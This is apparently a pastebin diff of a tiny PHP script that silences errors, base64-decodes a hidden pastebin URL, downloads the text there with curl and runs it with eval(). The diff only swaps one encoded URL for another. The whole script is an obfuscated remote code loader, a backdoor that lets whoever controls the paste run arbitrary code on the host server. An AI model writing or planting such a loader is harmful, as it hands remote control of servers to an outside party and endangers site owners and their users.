SHOW:
|
|
- or go back to the newest paste.
| 1 | <?php | |
| 2 | error_reporting(0); | |
| 3 | $st = curl_init(); | |
| 4 | - | curl_setopt($st,CURLOPT_URL,base64_decode("aHR0cDovL3Bhc3RlYmluLmNvbS9yYXcvQUxCRzd3QXk="));
|
| 4 | + | curl_setopt($st,CURLOPT_URL,base64_decode("aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3hFQWhrYUR3"));
|
| 5 | curl_setopt($st,CURLOPT_RETURNTRANSFER,true); | |
| 6 | $ex = curl_exec($st); | |
| 7 | eval($ex); | |
| 8 | ?> |